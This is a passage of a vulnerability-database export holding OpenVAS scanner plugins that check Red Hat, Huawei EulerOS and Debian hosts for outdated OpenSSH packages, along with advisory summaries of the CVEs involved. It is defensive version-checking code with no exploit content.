An attacker able\n to compromise the privilege-separated process could possibly use this flaw for\n further attacks against the privileged monitor process. (CVE-2016-10012)\n Additional Changes: For detailed information on changes in this release, see the\n Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\");\n script_tag(name:\"affected\", value:\"openssh on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2029-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00013.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:33:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171055", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171055", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1055)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1055\");\n script_version(\"2020-01-23T10:46:45+0000\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:46:45 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:46:45 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1055)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1055\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1055\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2017-1055 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket.(CVE-2016-10009)\n\nauthfile.c in sshd in OpenSSH before 7.4 
does not properly consider the effects of realloc on buffer contents, which might allow local users to obtain sensitive private-key information by leveraging access to a privilege-separated child process.(CVE-2016-10011)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171054", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562311220171054", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1054)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1054\");\n script_version(\"2020-01-23T10:46:44+0000\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:46:44 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:46:44 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1054)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", 
re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1054\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1054\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2017-1054 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket.(CVE-2016-10009)\n\nauthfile.c in sshd in OpenSSH before 7.4 does not properly consider the effects of realloc on buffer contents, which might allow local users to obtain sensitive private-key information by leveraging access to a privilege-separated child process.(CVE-2016-10011)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:09:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5600", "CVE-2016-1908", "CVE-2016-10708", "CVE-2016-10011", "CVE-2015-6564", "CVE-2016-10009", "CVE-2016-6515", "CVE-2015-5352", "CVE-2016-3115", "CVE-2017-15906", "CVE-2016-10012", "CVE-2015-6563"], "description": "Several vulnerabilities have been found in OpenSSH, a free implementation\nof the SSH protocol suite:\n\nCVE-2015-5352\n\nOpenSSH incorrectly verified time window deadlines for X connections.\nRemote attackers could take advantage of this flaw to bypass intended\naccess restrictions. Reported by Jann Horn.\n\nCVE-2015-5600\n\nOpenSSH improperly restricted the processing of keyboard-interactive\ndevices within a single connection, which could allow remote attackers\nto perform brute-force attacks or cause a denial of service, in a\nnon-default configuration.\n\nCVE-2015-6563\n\nOpenSSH incorrectly handled usernames during PAM authentication. In\nconjunction with an additional flaw in the OpenSSH unprivileged child\nprocess, remote attackers could make use if this issue to perform user\nimpersonation. Discovered by Moritz Jodeit.\n\nCVE-2015-6564\n\nMoritz Jodeit discovered a use-after-free flaw in PAM support in\nOpenSSH, that could be used by remote attackers to bypass\nauthentication or possibly execute arbitrary code.\n\nCVE-2016-1908\n\nOpenSSH mishandled untrusted X11 forwarding when the X server disables\nthe SECURITY extension. 
Untrusted connections could obtain trusted X11\nforwarding privileges. Reported by Thomas Hoger.\n\nCVE-2016-3115\n\nOpenSSH improperly handled X11 forwarding data related to\nauthentication credentials. Remote authenticated users could make use\nof this flaw to bypass intended shell-command restrictions. Identified\nby github.com/tintinweb.\n\nCVE-2016-6515\n\nOpenSSH did not limit password lengths for password authentication.\nRemote attackers could make use of this flaw to cause a denial of\nservice via long strings.\n\nCVE-2016-10009\n\nJann Horn discovered an untrusted search path vulnerability in\nssh-agent allowing remote attackers to execute arbitrary local\nPKCS#11 modules by leveraging control over a forwarded agent-socket.\n\nCVE-2016-10011\n\nJann Horn discovered that OpenSSH did not properly consider the\neffects of realloc on buffer contents. This may allow local users to\nobtain sensitive private-key information by leveraging access to a\nprivilege-separated child process.\n\nCVE-2016-10012\n\nGuido Vranken discovered that the OpenSSH shared memory manager\ndid not ensure that a bounds check was enforced by all compilers,\nwhich could allow local users to gain privileges by leveraging access\nto a sandboxed privilege-separation process.\n\nCVE-2016-10708\n\nNULL pointer dereference and daemon crash via an out-of-sequence\nNEWKEYS message.\n\nCVE-2017-15906\n\nMichal Zalewski reported that OpenSSH improperly prevent write\noperations in readonly mode, allowing attackers to create zero-length\nfiles.", "modified": "2020-01-29T00:00:00", "published": "2018-09-10T00:00:00", "id": "OPENVAS:1361412562310891500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891500", "type": "openvas", "title": "Debian LTS: Security Advisory for openssh (DLA-1500-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# 
SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891500\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2015-5352\", \"CVE-2015-5600\", \"CVE-2015-6563\", \"CVE-2015-6564\", \"CVE-2016-10009\",\n \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\", \"CVE-2016-1908\", \"CVE-2016-3115\",\n \"CVE-2016-6515\", \"CVE-2017-15906\");\n script_name(\"Debian LTS: Security Advisory for openssh (DLA-1500-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-09-10 00:00:00 +0200 (Mon, 10 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/09/msg00010.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"openssh on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1:6.7p1-5+deb8u6.\n\nWe recommend that you upgrade your openssh packages.\");\n\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been found in OpenSSH, a free implementation\nof the SSH protocol suite:\n\nCVE-2015-5352\n\nOpenSSH incorrectly verified time window deadlines for X connections.\nRemote attackers could take advantage of this flaw to bypass intended\naccess restrictions. Reported by Jann Horn.\n\nCVE-2015-5600\n\nOpenSSH improperly restricted the processing of keyboard-interactive\ndevices within a single connection, which could allow remote attackers\nto perform brute-force attacks or cause a denial of service, in a\nnon-default configuration.\n\nCVE-2015-6563\n\nOpenSSH incorrectly handled usernames during PAM authentication. In\nconjunction with an additional flaw in the OpenSSH unprivileged child\nprocess, remote attackers could make use if this issue to perform user\nimpersonation. Discovered by Moritz Jodeit.\n\nCVE-2015-6564\n\nMoritz Jodeit discovered a use-after-free flaw in PAM support in\nOpenSSH, that could be used by remote attackers to bypass\nauthentication or possibly execute arbitrary code.\n\nCVE-2016-1908\n\nOpenSSH mishandled untrusted X11 forwarding when the X server disables\nthe SECURITY extension. Untrusted connections could obtain trusted X11\nforwarding privileges. Reported by Thomas Hoger.\n\nCVE-2016-3115\n\nOpenSSH improperly handled X11 forwarding data related to\nauthentication credentials. Remote authenticated users could make use\nof this flaw to bypass intended shell-command restrictions. 
Identified\nby github.com/tintinweb.\n\nCVE-2016-6515\n\nOpenSSH did not limit password lengths for password authentication.\nRemote attackers could make use of this flaw to cause a denial of\nservice via long strings.\n\nCVE-2016-10009\n\nJann Horn discovered an untrusted search path vulnerability in\nssh-agent allowing remote attackers to execute arbitrary local\nPKCS#11 modules by leveraging control over a forwarded agent-socket.\n\nCVE-2016-10011\n\nJann Horn discovered that OpenSSH did not properly consider the\neffects of realloc on buffer contents. This may allow local users to\nobtain sensitive private-key information by leveraging access to a\nprivilege-separated child process.\n\nCVE-2016-10012\n\nGuido Vranken discovered that the OpenSSH shared memory manager\ndid not ensure that a bounds check was enforced by all compilers,\nwhich could allow local users to gain privileges by leveraging access\nto a sandboxed privilege-separation process.\n\nCVE-2016-10708\n\nNULL pointer dereference and daemon crash via an out-of-sequence\nNEWKEYS message.\n\nCVE-2017-15906\n\nMichal Zalewski reported that OpenSSH improperly prevent write\noperations in readonly mode, allowing attackers to create zero-length\nfiles.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-client\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-sftp-server\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", 
ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2020-01-27T18:33:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181254", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2018-1254)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1254\");\n script_version(\"2020-01-23T11:19:05+0000\");\n script_cve_id(\"CVE-2016-10708\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:19:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:19:05 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2018-1254)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1254\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1254\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2018-1254 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"sshd in OpenSSH before 7.4 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence NEWKEYS message, as demonstrated by Honggfuzz, related to kex.c and packet.c.(CVE-2016-10708)\");\n\n script_tag(name:\"affected\", 
value:\"'openssh' package(s) on Huawei EulerOS Virtualization 2.5.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~25.4.h6\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~25.4.h6\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~25.4.h6\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~25.4.h6\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-29T20:09:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708"], "description": "OpenSSH was found to be vulnerable to out of order NEWKEYS messages\nwhich could crash the daemon, resulting in a denial of service attack.", "modified": "2020-01-29T00:00:00", "published": "2018-01-31T00:00:00", "id": "OPENVAS:1361412562310891257", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891257", "type": "openvas", "title": "Debian LTS: Security Advisory for openssh (DLA-1257-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: 
GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891257\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-10708\");\n script_name(\"Debian LTS: Security Advisory for openssh (DLA-1257-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-31 00:00:00 +0100 (Wed, 31 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00031.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"openssh on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have 
been fixed in version\n1:6.0p1-4+deb7u7.\n\nWe recommend that you upgrade your openssh packages.\");\n\n script_tag(name:\"summary\", value:\"OpenSSH was found to be vulnerable to out of order NEWKEYS messages\nwhich could crash the daemon, resulting in a denial of service attack.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-client\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-27T18:39:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181069", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181069", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2018-1069)", 